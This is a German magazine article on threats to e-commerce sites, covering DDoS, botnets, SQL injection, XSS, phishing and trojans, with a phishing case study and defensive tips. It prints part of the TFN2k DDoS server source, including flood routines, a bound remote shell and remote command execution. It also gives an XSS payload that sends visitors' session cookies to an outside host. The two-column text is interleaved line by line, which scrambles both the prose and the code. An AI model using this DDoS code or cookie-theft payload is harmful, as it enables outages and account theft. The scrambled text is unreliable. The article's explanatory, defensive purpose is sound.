Sie sind auf Seite 1von 8

ANGRIFF

MARKO ROGGE

Gefahrenquellen
für die Internet-
Geschäfte
Schwierigkeitsgrad
Als offene Netzinfrastruktur bietet das Internet neben seinen
Potentialen leider auch viele Gefahren, die mit der wachsenden
Akzeptanz und Nutzung der Infrastruktur und seiner darüber
abgewickelten Kommunikations- und Interaktionsvorgänge
eine für die Gesamtentwicklung ernst zu nehmende Bedeutung
einnehmen.

V
om klassischen Computer-Virus Angriff und Ausschaltung
über Datenklau- und -manipulations- der E-Commerce-Anwendung
mechanismen bis hin zu Server- Der Angriff auf die E-Commerce-Infrastrukutr
Lahmlegungen wartet die dunkle Seite des und die darin laufenden Anwendungen ist wohl
Internets mit einer ganzen Bandbreite von das älteste Problem, mit dem Internet-Anbieter
Risiken auf, die insbesondere bei einer zu kämpfen haben. Zu unterscheiden sind hier-
wirtschaftlichen Nutzung eine deutliche bei die Übernahme und kontrollierte Steuerung
Bedrohung darstellen. Angreifer sind vielfach von Systemen mit Hilfe von Computer-Viren wie
nicht mehr nur IT-verliebte Hacker oder z.B. Win32/Sasser und die Angriffe auf Systeme
Spammer, sondern vielmehr Personen und durch nicht zu verarbeitende Anfragen auf die
Organisationen, die gezielt kriminelle Ziele System mit dem Ziel der Lahmlegung der Syste-
verfolgen und Schwachstellen der Infrastruktur me durch Auslastung der Rechnerkapazitäten.
und der darin laufenden Anwendungen zu ihren
Zwecken ausnutzen. Neben dem monetären DDoS Angriffe
Schaden entsteht dabei insbesondere bei Diese Art von Angriffen (Distributed Denial of
IN DIESEM ARTIKEL E-Commerce-Anbietern ein viel höherer und Service, DDoS) ist aufgrund der Verteilung von
ERFAHREN SIE:
im schnelllebigen Internet-Geschäft oftmals Rechnerkapazitäten sehr gefährlich. Ein Urheber
Welche Gefahren drohen in
Onlineshops für Betreiber und irreparabler Image-Schaden, den es gilt mit ist schwer zu ermitteln, da diese meistens ein
für Kunden, entsprechenden Maßnahmen zu bekämpfen ganzes Botnet betreiben und steuern, und sich
Angriffsszenarien im Detail bzw. von vornherein auszuschließen. Welche über Proxyserver verstecken.
vorgestellt,
unterschiedlichen Gefahrenquellen zu Eines der mächtigsten und bekanntesten Pro-
Fallbeispiel, berücksichtigen sind, soll daher im folgenden gramme, um DDoS-Attacken erfolgreich auszu-
Schutzmaßnahmen. Artikel aufgezeigt werden. führen ist TFN2k, Tribe Flood Network 2000.
Unterschieden werden dabei drei verschie- Es gibt mehrere Arten von Angriffen,
WAS SIE VORHER dene Gefahrenarten, die an verschiedenen die koordiniert werden können, darunter
WISSEN/KÖNNEN
Punkten im Rahmen der E-Commerce-Trans- UDP (Bandbreitenüberlastung durch UDP-
SOLLTEN:
aktion einwirken können: zum einen auf der Pakete, und ICMP-Fehlermeldungen, die vom
Grundlagen Webserver und
Applikationen, Anwender-Seite durch Täuschung, zum ande- Angriffsziel generiert werden, wenn ein UDP-
XSS, SQL und PHP Kenntnisse, ren durch eine Manipulation konkreter Trans- Paket auf einen geschlossenen Port trifft), durch
Grundlagen Internetshops;
aktionsvorgänge und letztendlich durch den ICMP-Pakete (Ping-Anfragen die entsprechend
Angrif f und die Ausschaltung ganzer Ser ver Ping-Antworten generieren), sowie TCP/SYN-
Wissen über Phishing, DDoS,
Man-in-the-Middle. und E-Commerce-Angebote. Angriffe (permanente Anfragen von zufälligen

108 HAKIN9 extra 1/2010


GEFAHRENQUELLEN FÜR DIE INTERNET-GESCHÄFTE

Quelladdressen, neue TCP-Verbindungen den Transaktionen mit dem Kunden nicht ein Angreifer zum einen die Daten mani-
aufzubauen, was nicht nur die Bandbreite, mehr sicher. Darüber hinaus bieten aber puliere, und den Server für weitere Angriffe
sondern auch die Resourcen von auch viele Anwendungen bereits eigene mißbrauchen kann. In der Regel treten SQL
Serverprogrammen, etwa eines Apache Schwachstellen, die von Angreifern ohne Injektions dann auf, wenn die Parameter, die
Webservers, sowie von Betriebssystemen direktes Eindringen und Ausführen von von einem Benutzer angegeben werden,
überlastet). Programmen mit Hilfe von Viren oder an- nicht gesondert geprüft und so an die Da-
Darüber hinaus bietet TFN2k die ver- deren Zugriffsmethoden ausgenutzt wer- tenbank weiter gereicht werden. Es sollte bei
teilte Targa3-Attacke. Hierbei handelt es den können. Hierzu zählen vor allem die Datensätzen in der Eingabe immer darauf
sich um Pakete, die mit zufälligen Werten im folgenden erläuterten SQL Injection geachtet werden, dass diese auch den rich-
erstellt werden. Es kann sich also um UDP, Bugs und das Cross-Site-Scripting (XSS). tigen Datentypen entsprechen. Beispiels-
ICMP, IGMP, TCP, oder andere Protokolle weise dürfen Zahlen nur aus echten Ziffern
handeln, um Fragmente, oder nach den Angriff durch SQL Injection bestehen und dem Dezimaltrennzeichen.
Protokollstandards völlig ungültige Pakete. Bugs Stored Procedures sind hier eine Möglich-
Dies stellt eine Herausforderung für Unter Serverseitigen Angriffen versteht keit auf Sicherheit zu setzen.
die Implementation des Netzwerksubsys- man das Ausnutzen von Schwachstellen Sind Stored Procedures die einzige
tems vieler Betriebssysteme dar, die nicht der Software in Shopsystemen etc. Hier- Methode – kann ich das nicht auch durch
alle Sonderfälle von ungültigen Datenpa- bei kann es in PHP, SQL oder direkt in Überprüfung der INSERT-Statements
keten ohne weiteres verarbeiten können. den Serverbetriebssystemen zu Angriffen abfangen?
Zu den weiteren Features von TFN2k kommen, wenn Software nicht auf dem Die Benutzereingaben in einem Pro-
zählen Decoy-Pakete, also Dummies, die aktuellsten und sichersten Stand ist. gramm werden dabei in so genannte
zusätzlich zu den echten verschickt wer- In sehr vielen Fällen ist es möglich, Stored Procedures übergeben. Erst dort
den können, um eine Entdeckung des durch Schwachstellen in Datenbanken via wird dann die tatsächliche SQL-Abfrage
Traffics zusätzlich zu erschweren. TFN2k SQL direkt auf diese Zugriff zu erhalten. durchgeführt, wodurch ein Zufügen weiterer
ist darüber hinaus Multi-Plattform-fähig, Alle hier abgelegten Daten von Kunden Abfragen oder Codes nicht möglich ist.
läuft also auf den meisten gängigen Be- und Produkten etc. sind somit frei verfügbar. Vorsicht ist jedoch bei Microsoft SQL-
triebssystemen. Das bedeutet, es wäre Ein Angreifer hätte so die Möglichkeit, Servern geboten. Bei einigen dieser Server
möglich, DDoS-Server auf Linux, Sola- die gesammelten Daten an einen Wettbe- werden Stored Procedures mitgeliefert, die
ris, BSD und Windows NT Systemen zu werber zu verkaufen. es ermöglichen über eine Shell einen wei-
installieren, und Angriffe von all diesen Diese Art ist nicht unbekannt und wird teren Benutzer in der Datenbank anzulegen,
Systemen gleichzeitig zu koordinieren. oftmals verheimlicht; Betroffene melden und so Zugriff auf den Server zu erlangen.
solche Zwischenfälle aus Scham zu sel- Eine weitere Schutzmaßnahme die
Abwehrmaßnahmen ten den Behörden. gegen SQL Angriffe wirksam ist kann
Erfolgreiche Abwehrmaßnahmen können nur SQL Injektion Bugs ist eine der Mög- direkt in PHP integriert werden und eine
direkt beim Provider getroffen mittels starken lichkeiten, Daten einzuschleusen, Daten zu Angriffsfläche wird nicht geboten. In PHP
Firewalls und Loadbalancern werden. Fire- verändern oder Administrator-Rechte auf kann man das mit der Funktion mysql_
walls erkennen in der heutigen Zeit bereits einem Server zu erhalten. Folge wäre, dass escape_string erledigen. Wichtig hierbei
recht früh, wenn sich eine DDoS Attacke
ankündigt und können die Kommunikation DDoS Programme
unterbinden. Von Erfolg ist dies nicht immer
Packetstrom Security
gekrönt, da im Nachgang das System dann
nicht mehr erreicht werden kann. Diese Vor- • http://packetstormsecurity.org/distributed/ – DDoS Programme
gehensweise ist aber nicht im Interesse eines • http://www.brain-pro.de/Seiten/ddos/ddos.htm – TFN2k im Detail
Diensteanbieters, und so kann man versu- • http://staff.washington.edu/dittrich/misc/tfn.analysis – David Dittrich
chen, über einen Lastenausgleich (Loadba- • http://www.heise.de/tp/r4/artikel/5/5766/1.html – Hintergrund
lancern) einer DDoS Attacke entgegen zu
wirken. Bei der Auswahl eines Providers, wo
der Server steht, sollte auf solche Sicherheits- Botnets
maßnahmen geachtet werden.
Botnets sind Netzwerke von mehreren tausend und mehr Computern die fernsteuerbar sind und ge-
zielt für Spam oder DdoS Angriffe benutzt werden können. So genannte Bots werden auf Computern
Angriff auf den die ungeschützt sind über andere Schädlinge eingeschleust und können dann von einem Botnet
Datenaustausch Betreiber gesteuert werden. Hierbei wird immer mehr darauf geachtet, daß man diese Botnets so
und die Transaktion sicher wie möglich und unsichtbar aufbaut. Diese können dann je Stunde oder je Angriff gemietet
Ist ein Server erst einmal in der Hand ei- werden und so nutzen Cyberkriminelle Botnets um Schutzgelderpressungen durchzuführen. Details
nes Angreifers, sind natürlicherweise auch dazu in einer Studie von McAfee:
http://www.harvardpr.com/home/article_details.asp?id=7225
die Anwendungen und die darin ablaufen-

1/2010 HAKIN9 extra 109


ANGRIFF
Listing 1. Serverprogramm von TFN2k

/* signal (SIGCHLD, SIG_IGN);


* Tribe FloodNet - 2k edition
* by Mixter <mixter@newyorkoffice.com> while (1)
* {
* td.c - tribe flood server FD_ZERO (&rfds);
* FD_SET (isock, &rfds);
* This program is distributed for educational purposes and FD_SET (usock, &rfds);
without any FD_SET (tsock, &rfds);
* explicit or implicit warranty; in no event shall the if (select (usock + 1, &rfds, NULL, NULL, NULL) < 1)
author or continue;
* contributors be liable for any direct, indirect or if (FD_ISSET (isock, &rfds))
incidental damages {
* arising in any way out of the use of this software. i = read (isock, buf, BS) - (sizeof (struct ip) +
* sizeof (struct icmp));
*/ myip = htonl (iph->dst);
if (i < 4)
#include "tribe.h" continue;
p = (buf + sizeof (struct ip) + sizeof (struct icmp));
extern int fw00ding, nospoof, port4syn, psize; if (!isprint (p[0]))
extern unsigned long myip; continue;
extern void security_through_obscurity (int); memset (clear, 0, BS);
security_through_obscurity (1);
void tribe_cmd (char, char *, char **); decode64 (p, clear, i);
memset (buf, 0, BS);
int security_through_obscurity (0);
main (int argc, char **argv) if ((tribeh->start == PROTO_SEP) && (tribeh->end ==
{ PROTO_SEP))
char buf[BS], clear[BS]; tribe_cmd (tribeh->id, data, argv);
struct ip *iph = (struct ip *) buf; }
struct tribe *tribeh = (struct tribe *) clear; if (FD_ISSET (tsock, &rfds))
int isock, tsock, usock, i; {
char *p = NULL, *data = (clear + sizeof (struct tribe)); i = read (tsock, buf, BS) - (sizeof (struct ip) +
fd_set rfds; sizeof (struct tcp));
myip = htonl (iph->dst);
isock = socket (AF_INET, SOCK_RAW, ICMP); if (i < 4)
tsock = socket (AF_INET, SOCK_RAW, TCP); continue;
usock = socket (AF_INET, SOCK_RAW, UDP); p = (buf + sizeof (struct ip) + sizeof (struct tcp));
if (!isprint (p[0]))
if (geteuid ()) continue;
exit (-1); memset (clear, 0, BS);
security_through_obscurity (1);
memset (argv[0], 0, strlen (argv[0])); decode64 (p, clear, i);
strcpy (argv[0], HIDEME); memset (buf, 0, BS);
close (0); security_through_obscurity (0);
close (1); if ((tribeh->start == PROTO_SEP) && (tribeh->end ==
close (2); PROTO_SEP))
#ifndef WINDOZE tribe_cmd (tribeh->id, data, argv);
if (fork ()) }
exit (0); if (FD_ISSET (usock, &rfds))
#else {
switch (fork ()) i = read (usock, buf, BS) - (sizeof (struct ip) +
{ sizeof (struct udp));
case -1: myip = htonl (iph->dst);
perror ("fork"); if (i < 4)
exit (0); continue;
break; p = (buf + sizeof (struct ip) + sizeof (struct udp));
case 0: if (!isprint (p[0]))
break; continue;
default:
break;
}
#endif

signal (SIGHUP, SIG_IGN);


signal (SIGTERM, SIG_IGN);

110 HAKIN9 extra 1/2010


GEFAHRENQUELLEN FÜR DIE INTERNET-GESCHÄFTE

Fortsetzung von Listing 1.

memset (clear, 0, BS); */


security_through_obscurity (1); usleep (100);
decode64 (p, clear, i); fw00ding = 0;
memset (buf, 0, BS); break;
security_through_obscurity (0); case ID_SYNPORT:
if ((tribeh->start == PROTO_SEP) && (tribeh->end == port4syn = atoi (target); /* syn port set */
PROTO_SEP)) break;
tribe_cmd (tribeh->id, data, argv); case ID_PSIZE:
} psize = atoi (target); /* new packet size */
} break;
/* 1 != 1 */ case ID_SWITCH:
return (0); switch (atoi (target))
} {
case 0:
void nospoof = 0; /* spoof mask: *.*.*.* */
tribe_cmd (char id, char *target, char **argp) break;
{ case 1:
#ifdef ATTACKLOG nospoof = 1; /* spoof mask: real.*.*.* */
{ break;
char tmp[BS]; case 2:
sprintf (tmp, "PID %d CMD '%c' TARGET %s\n" nospoof = 2; /* spoof mask: real.real.*.* */
,getpid (), id, target); break;
dbug (tmp); case 3:
} nospoof = 3; /* spoof mask: real.real.real.* */
#endif break;
default:
switch (id) break;
{ }
case ID_ICMP: break;
if (fw00ding) /* already in progress, ignored */ case ID_SHELL:
break; shellsex (atoi (target)); /* shell bound to target
fw00ding = 3; /* commencing ICMP/8 flood */ port */
strcpy (argp[0], HIDEKIDS); break;
commence_icmp (target); case ID_TARGA:
strcpy (argp[0], HIDEME); if (fw00ding) /* already in progress, ignored */
break; break;
case ID_SMURF: fw00ding = 4; /* commencing targa3 attack */
if (fw00ding) /* already in progress, ignored */ strcpy (argp[0], HIDEKIDS);
break; commence_targa3 (target);
fw00ding = 4; /* commencing SMURF broadcast flood strcpy (argp[0], HIDEME);
*/ break;
strcpy (argp[0], HIDEKIDS); case ID_MIX:
commence_smurf (target); if (fw00ding) /* already in progress, ignored */
strcpy (argp[0], HIDEME); break;
break; fw00ding = 5; /* commencing interval flood */
case ID_SENDUDP: strcpy (argp[0], HIDEKIDS);
if (fw00ding) /* already in progress, ignored */ commence_mix (target);
break; strcpy (argp[0], HIDEME);
fw00ding = 1; /* commencing UDP flood */ break;
strcpy (argp[0], HIDEKIDS); case ID_REXEC:
commence_udp (target); system (target);
strcpy (argp[0], HIDEME); break;
break; default:
case ID_SENDSYN: break;
if (fw00ding) /* already in progress, ignored */ }
break; }
fw00ding = 2; /* commencing SYN flood */
strcpy (argp[0], HIDEKIDS);
commence_syn (target, port4syn);
strcpy (argp[0], HIDEME);
break;
case ID_STOPIT:
if (!fw00ding) /* this has no longer a meaning
*/
break;
must_kill_all (); /* all flood childs terminating

1/2010 HAKIN9 extra 111


ANGRIFF
ist dann, daß alle Parameter die aus sich, zum sicheren Browsen für Kunden sätze zum Erhaschen von Passwörtern fin-
einer Anwendung kommen und in den das aktive Java Skript zu deaktivieren. den sich in diversen Trojanischen Pferden,
Querystring gehen damit escapet werden die speziell dafür programmiert sind.
müssen. Angriff auf den E- So versuchen gefälschte Telekomrech-
Eine weitere Schwachstelle in diesem Commerce-Kunden nungen Usern einen Trojaner (Trojanisches
Zusammenhang besteht in den CGI-Skrip- Auch wenn die Computer-Systeme des Pferd) unterzujubeln und veranlassen den
ten, die unsicher oder unsauber program- Kunden nicht im Verfügungsbereich des User dazu, diesen zu starten. Dies ge-
miert wurden. Hier besteht die Möglichkeit, Anbieters liegen, so sollten doch die An- schieht fast unbemerkt mit dem Klicken
mehr Ausgabetext zu erhalten, als das griffe mit Bezug auf das Kundenverhältnis auf eine vermeintliche Onlinerechnung, die
Skript eigentlich bei der Übergabe von zum Anbieter vom Anbieter bedacht und sich aber dann als ein Trojaner entpuppt.
Daten an den Server ausgeben soll. Ein berücksichtigt werden. Zugangsdaten und Kundeninformati-
Angreifer kann sich somit ebenfalls des Eine der größten Gefahren stellt der- onen sollen damit dann illegal erworben
Servers bemächtigen und hat vollen Zu- zeit das so genannte Phishing dar, wel- werden und könnten so Ausnutzung fin-
griff darauf. Eine weitere Form beliebter ches nicht nur im reinen Bankenumfeld den.
serverseitiger Angriffe ist unter dem Begriff zu finden ist.
Cross-Site Scripting (XSS) bekannt. Während das US-Marktforschung- Man-In-The-Middle Angriffe
Hierbei wird versucht, Code auf einen sunternehmen Gartner schätzt, dass durch auf den Kunden
Server zu schleusen und diesen ausführ- Phishing allein in den USA im Jahre 2005 Wie durch den Namen zu vermuten ist
bar zu machen. In Verbindung mit SQL In- ein Schaden von rund 2,75 Milliarden Dol- gelangt hier ein Angreifer mittels einer
jektion eine sehr gefährliche Kombination. lar verursacht wurde, meldet die Financial Schadsoftware direkt in die Kommunika-
Gerade in PHP finden sich oftmals Mög- Times Deutschland, dass deutsche Ban- tion zwischen
lichkeiten, Codes direkt auf dem Server über ken durch Phishing-Angriffe im letzten Jahr Hierbei gibt es derzeit aktuell ernstzu-
Befehle wie include auszuführen, wenn die- rund 70 Millionen Euro verloren haben. nehmende Entwicklungen von Schadsoft-
se nicht gesichert behandelt werden. Seit Mitte 2005 beobachtet die Polizei ware wie Würmer und Trojaner die so viele
Werden z.B. Steuerzeichen wie <> und in Baden-Würtemberg einen sprunghaf- Funktionen haben das selbst die Anti-Virus
Tags <script> vor der Ausgabe an den ten Anstieg von Phishing-Fällen. Wurden Hersteller kaum mit den Updates und Sig-
Browser nicht in HTML umgewandelt, würde im Jahre 2004 nur wenige Einzelfälle re- naturen nachkommen.
der Browser es als Java Skript interpretieren. gistriert, wurden bis Ende 2005 bereits Neuartige Trojaner verstehen sich
Es wäre also möglich, hier ein Java 270 Fälle mit einem Gesamtschaden von unter Windows Systemen unsichtbar zu
Skript hinzu zu fügen, den Session Cookie rund 1,3 Millionen Euro angezeigt. Die Ber- machen und die eigenen Prozesse zu ver-
auszulesen und an einen fremden Rech- liner Polizei berichtet über Fälle, in denen stecken (rootkits).
ner zu senden. Einzelschäden von bis zu 29.000 Euro ent- Diese Trojaner übermitteln dann Daten
standen sind. die gesammelt oder vom Anwender ein-
(( Marko Rogge <script>(new Image) Bekanntlich kommen oft genug falsche gegeben werden direkt an einen Angreifer
.src=''http://www.marko-rogge.de/ Meldungen und E-Mails von Ebay, in denen der die Schadsoftware steuern kann.
s/c.php?c=''+escape man aufgefordert wird, die Kontodaten und/ Diese Trojaner beherrschen
(document.cookie);</script>)). oder Zugangsdaten preiszugeben. Aber ebenfalls die Möglichkeit über eine
nicht nur Ebay wird es schwer gemacht, Schwachstelle im Internet Explorer die
Dem Besucher der Webseite wird nun der sich am Markt durch solche Meldungen zu Verbindung zum echten Bankserver zu
Name Marko Rogge angezeigt und sein ei- behaupten, denn langfristig stellt sich bei unterbinden während der Kunde die
gener Session Cookie an einen fremden einigen Usern die Vertrauensfrage und für Überweisung eingibt.
Rechner geschickt. Generell empfiehlt es Ebay eine Imagefrage. Vergleichbare An- Die echte Überweisung gelangt über
eine Umleitung dann auf ein anderes
Konto und der Betroffene merkt hier den
Sicherheit beim Onlineshopping Betrug erst nach Abschluß der Überwei-
Ein sehr renommiertes Zahlsystem, welches sich auf sehr vielen Webseiten wieder findet, ist
Click&Buy (TM) von FIRSTGATE. Hiermit lassen sich kostenpflichtige Premiumdienste oder Down- sung mit einer Fehlermeldung im Internet
loads von kleinen bis großen Beträgen direkt buchen. FIRSTGATE arbeitet mit Servern in einem Explorer.
Hochsicherheitsrechenzentrum, bietet volle SSL-Verschlüsselung der Daten vom und zum Kun- Bekannt für ein solches Verhalten ist
den an, und ist darüber hinaus mit dem Zertifikat BSI-GSZ-0019-2005 vom BSI (Bundesamt für unter anderem der Trojaner TR/small.az3.
Sicherheit in der Informationstechnologie) geprüft worden. Ein sehr wesentlicher Punkt, der sich
Aktuell werden solche Schädlinge über Phis-
auf den Webseiten der FIRSTGATE AG wiederfinden lässt, ist der Bereich Datenschutz. Unter an-
hingmails oder manipulierte Webserver in
derem wird sehr deutlich und klar erklärt, welche Funktionen Cookies haben, wie diese verwen-
det werden, und was in diesem Zusammenhang Datenschutz für den Kunden bedeutet. Somit ist ein System eingeschleust. Dieses Manöver
dieses Unternehmen ein Beispiel für viele weitere, die folgen werden, um Kunden und Anbietern gelingt den Angreifern häufig über bereits er-
genau die Grundlage der Sicherheit zu bieten, die notwendig ist. wähnte Schwachstellen im Internet Explorer
die ungepatcht sind bislang.

112 HAKIN9 extra 1/2010


GEFAHRENQUELLEN FÜR DIE INTERNET-GESCHÄFTE

Ein Angriff dieser Form und Art ist im- Die geparkte Domain gehört der Firma um möglicherweise Opfer von Attacken via
mer sehr gefährlich da die Trojaner immer Cygnus Design aus San Diego, Californien. Phishing oder Computerwürmern zu werden.
ausgefeilter programmiert werden und Administrativer Kontakt ist Steve Aitchison aus Kunden sollten auf einer Informations-
Funktionen besitzen sich mehrfach in das Bellingham, Washington. seite aktuelle Sicherheitshinweise erhal-
System zu schreiben und dadurch noch Die Kopfzeile X-Source-Dir der Mail zeigt ten, und es sollte Kunden und Besuchern
schwerer zu entdecken. auf ein Mail-Script auf pharmacongress.com. der Seite oder des Internetshops erklärt
Derzeit arbeiten Sicherheitsexperten Diese Website enthält Informationen über werden, in welchem Umfang und welche
auf der ganzen Welt daran, entsprechen- einen Pharmaziekongress. Interessant hier: Art von E-Mails an ihn zugestellt werden.
de Sicherheitslösungen zu entwickeln die Die Website scheint von Cygnus Design, Sehr gute Anti-Spam-Software erkennt
auch diese Art der Angriffe zuverlässig den Inhabern der Domain cygnusnet.com auch anhand einfacher Codeschnipsel in
abwehren kann. erstellt und registriert zu sein. E-Mails, ob es sich hierbei um eine Spam
Als technischer Ansprechpartner taucht und/oder Phishing E-Mail handelt.
Fallbeispiel wiederum Steve Aitchison aus Washington Anti-Spam-Lösungen wie Spamassas-
Einen Fall möchten wir Ihnen im Detail nicht auf. Tino Fritzsch von Nutzwerk vermutet sin sind trainierbar und lernen selbständig,
vorenthalten, der deutlich die steigenden anhand dieser Indizien, dass der Ser- einmal als Spam/Phishing markierte E-
Gefahren von Phishing aufzeigt. ver pharmacongress.com missbräuch- Mails dann sofort und dauerhaft auszufil-
Anfang Dezember 2005 fielen Tino lich für den Versand der Ebay-Phishing- tern. (http://spamassassin.org/index.html)
Fritzsch, Softwareentwickler des Safer- Mails verwendet wurde. Möglich wird so So gelangt beim Kunden dann nur die
Surf-Labors der Leipziger Firma Nutz- etwas, wenn Passwörter für Accounts ge- E-Mail im Postfach, die auch tatsächlich
werk, E-Mails des Auktionshauses auf. stohlen oder geknackt wurden, erklärt er. als echte E-Mail identifiziert wurde.
Wir entwickeln gerade einen Phishing- Nutzwerk hat die Administratoren der Man kann Hinweise geben, wie mit E-
Filter. Eine frühe Version dieses Filters Website vorsorglich informiert. Spam- Mails von unbekannten Absendern umzu-
hat die fraglichen E-Mails abgefangen, versender, Phishingmailsender und In- gehen ist.
erklärt Fritzsch. Im Text der Nachrichten ternetbetrüger werden offenbar immer Zum einen kann man hier ausgrenzen,
schien ein Ebay-Benutzer Fragen zu ei- geschickter. Nicht nur, dass die vermeintli- wenn man den Namen und Betreff nicht
nem angebotenen Artikel zu haben und chen Ebay-Mails immer echter aussehen, zuordnen kann.
stellte diese auf Englisch. auch versuchen die Urheber immer mehr, Kunden ist es ratsam zu empfehlen
Ein Blick in den Quellcode der HTML- ihre Spuren zu verwischen. Den wirklichen sich mit der integrierten WindowsXP SP2
E-Mail brachte rasche Erkenntnis. Der Hintermännern auf die Schliche zu kom- Firewall zu beschäftigen und diese auch
Link, den man anklicken sollte, führte nicht men, scheint aussichtslos. zu aktivieren.
etwa zu den Ebay-Seiten, sondern auf Es macht sich mehr und mehr das Infos dazu finden Sie auf der Security
sunpowercom.net, berichtet der Informati- Gefühl breit, dass teilweise organisiert Seite von Microsoft, siehe Kasten weitere
ker. Erstaunlich war die Qualität der Mails. krimineller Handel mit Passwörtern und Gefahren.
Sie waren auf den ersten Blick nicht als Zugangsdaten aus Shops und Banken Wer kein Microsoft Windows XP SP2
Fälschungen erkenntlich, berichtet er. Kein betrieben wird. (Service Pack 2) besitzt sollte sich über
Wunder – die Betrüger rufen in der E-Mail Somit ist es besonders in der heutigen eine Softwarefirewall oder auch Desktop-
Bilddateien von Ebay ab. So imitieren sie Zeit sehr wichtig geworden, besonnen mit firewall genannt Gedanken machen und
nahezu unbemerkt und in Echtzeit das De- dem Thema Sicherheit umzugehen. diese zum Einsatz kommen lassen.
sign des Auktionshauses. Auch der aufge- Sicherlich bieten Softwarefirewalls kei-
rufene Link war bis auf die Domain, auf die Sicherheitsansätze nen effektiven 100% Schutz, können aber
er zeigte, gut imitiert. Grundsätzlich ist es empfehlenswert, E- auf Verbindungen in das Internet achten
Wer darauf klickte, landete also auf Mails mit solchen Inhalten nicht zu öffnen und sind konfigurierbar.
dem Server sunpowercom.net und da-
mit in Korea, wie die WHOIS-Abfrage er-
brachte. Der zugehörige Adressbereich
Sichere CGI Programmierung
Sichere CGI Programmierung, eine Abhandlung von Martin-J. Muench:
wird ebenfalls in Korea, genauer gesagt
in Seoul, verwaltet. Mittlerweile ist die Phis- • http://www.brain-pro.de/Seiten/4.htm
hing-Seite, auf die der Antworten-Link führ- • http://www.codito.de
te, nicht mehr aktiv. Überhaupt scheint die
gesamte Website sunpowercom.net von
Fehlern und toten Links zu strotzen. Ob das
beabsichtigt ist, kann nicht gesagt werden.
XSS Hacks
Eine Ansammlung von Fehlern und Schwachstellen von Cross-Site Scripting finden Sie auf der
Interessanter ist auch der Verbreitungsweg Webseite http://ha.ckers.org/xss.html.
der Mail. Aus der Kopfzeile received wird der Weitere Quelle: http://observed.de
Server cpanel.cygnusnet.com ersichtlich.

1/2010 HAKIN9 extra 113


ANGRIFF
Eine Anti-Virus Software die sich persönlichen Daten wie Kreditkartenda- ern sind und der Betroffene Anwender
täglich mehrfach aktualisiert ist gegen ten, Name, Anschrift etc. auf. merkt nicht das er Teil eines großen Bot-
Schädlinge empfehlenswert und sollte Die Über tragung der Daten er folgt netzes ist.
gepflegt werden mit automatischen Up- zumeist noch unverschlüsselt und es Wie schon am Beispiel des Wett-
dates. ist nicht nachvollziehbar, wohin die büros (Angriff auf Wettbüros im Jahr
Weiterhin kann man Kunden empfeh- Daten transpor tier t und/oder abgelegt 2005 während der Fußballeuropameis-
len, auf Spam- oder Phishing-E-Mails nicht werden. Auch hier sollte man zukunf ts- terschafft) aufgezeigt werden dann ge-
zu antworten, da man sonst den Absen- sicher die Kunden genau darüber auf- zielt Angriffe auf Server durchgeführt
dern die Echtheit der E-Mail Adresse be- klären, was mit deren Daten passier t. die Dienstleistungen anbieten. Derartige
stätigt. Bei entsprechenden Transaktionen Es gibt unterschiedliche Ver fahren für Bedrohungen abzuwenden ist zum gro-
unterscheidet man grundlegend zwischen eine Transaktion, die entsprechende ßen Teil natürlich Aufgabe der Benutzer,
dem Macro- und Micropaymentsyste- Vor- und Nachteile haben. Anwender aber auch der Diensteanbie-
men. ter im Internet. Lösung kann hierbei ein
Im Falle von kleinen Beträgen bis zu Fazit und Ausblick erhötes Maß an Sicherheit sein, indem
5,- Euro spricht man von Micropayment, Botnetze sind eine derzeit sehr ernste Be- entsprechende Sicherheitsmaßnahmen
entsprechend bei Beträgen, die darüber drohung und nehmen immer mehr zu. ergriffen werden. Hierzu zählen natürlich
hinaus gehen, von Macropayment. Beim Hierbei handelt es sich um ein Netz- Firewalls, Virenschutzlösungen aber auch
Micropayment nutzt der Kunde in der Re- werk aus tausenden Computern die mit- Intrusion Detection und Intrusion Preven-
gel das Inkassoverfahren oder Abrech- tels eines Angreifers kontrolliert werden tion.
nung per Telefonrechnung oder gar per um dann gezielte Angriffe gegen Webser- Es zeigt sich also nicht nur bei Dienst-
Bankeinzug. Das ist bei kleinen Beträgen ver durchzuführen. leistern ab, daß mehr für die Sicherheit
sinnvoll, ökonomisch und zugleich auch Vornehmlich werden dafür Windows getan werden muß weil sich das Inter-
ausreichend sicher. Probleme mit der Si- Computer verwendet, die über einen net rasant ausbreitet und immer effekti-
cherheit treten hier bei der Angabe von Computerwurm infiziert einfach zu steu- ver Dienstleistungen angeboten werden
können.
Bei der Überlegung nach mehr Si-
Sicherheit aus der Sicht eines e-Shop Betreibers cherheit für Anbieter von Dienstleis-
In einem Gespräch mit Hannes Martin, EDV Leiter der M24 GmbH (moebel-24.de) stellte sich
schnell heraus, daß gerade Unternehmen die sich auf e-Commerce spezialisiert haben auch tungen und für Kunden empfehlen wir
einen gesteigerten Wert auf Sicherheit legen. nachfolgende Grundüberlegungen:
Herr Martin dazu: Wichtig ist uns, daß die Datenübertragung wärend des gesamten Bestellvor-
gangs SSL-Verschlüsselt wird und es werden zudem keine Kundenkontos mit Logindaten geführt. • Wie sicher ist die IT einer Institution?
Lediglich für eine Bestellung werden relevante Informationen per SSL übermittelt und dann im inter-
• Welche IT-Sicherheitsmaßnahmen
nen WAWI-System gepflegt. (WAWI = Warenwirtschaftsystem)
müssen ergriffen werden?
Martin betonte, daß der verwendete Shop von Trusted Shops zertifiziert und gekennzeichnet ist
und im Shop unmittelbar auf die Einhaltung der Datenschutzbestimmungen durch die M24 GmbH • Wie müssen diese Maßnahmen um-
hingewiesen. gesetzt werden?
Da sich immer mehr Unternehmen zukunftsorientiert auf e-Commerce einstellen geht • Wie hält beziehungsweise verbessert
die M24 GmbH gezielt im Interesse ihrer Kunden darauf ein, welcher seriöse Provider die ak- eine Institution das erreichte Sicher-
tuellen Sicherheits-Techniken und Software einsetzt. M24 GmbH achtet genau darauf, daß heitsniveau?
der Provider ebenfalls eine regelmäßige Aktuallisierung der eingesetzten Shopsoftware unter
• Wie sicher ist die IT relevanter Koope-
Beachtung neuster Sicherheitsaspekte durchführt.
rationspartner?

Im Nachgang sollten dann die Punkte für


den EDV Leiter oder Berater abgestimmt
Webseitenhinweise für Kunden werden.
Für IT-Sicherheitsbeauftragte gilt es,
• Ein Shop sollte beim Bezahlvorgang eine sichere Browserverbindung aufbauen (ssl, https);
insbesondere folgende Punkte zu be-
• Ein gültiges und ausgestelltes Zertifikat der Verbindung;
achten:
• Echte URL im Browser eintragen (z.B. https://www.meine-domain/shop/, gefälscht wür-
de das wahrscheinlich so aussehen: http://192.122.xxx.xxx/shop.de/~#/%%%20/shop.de/
index.php); • besonnen und systematisch an das
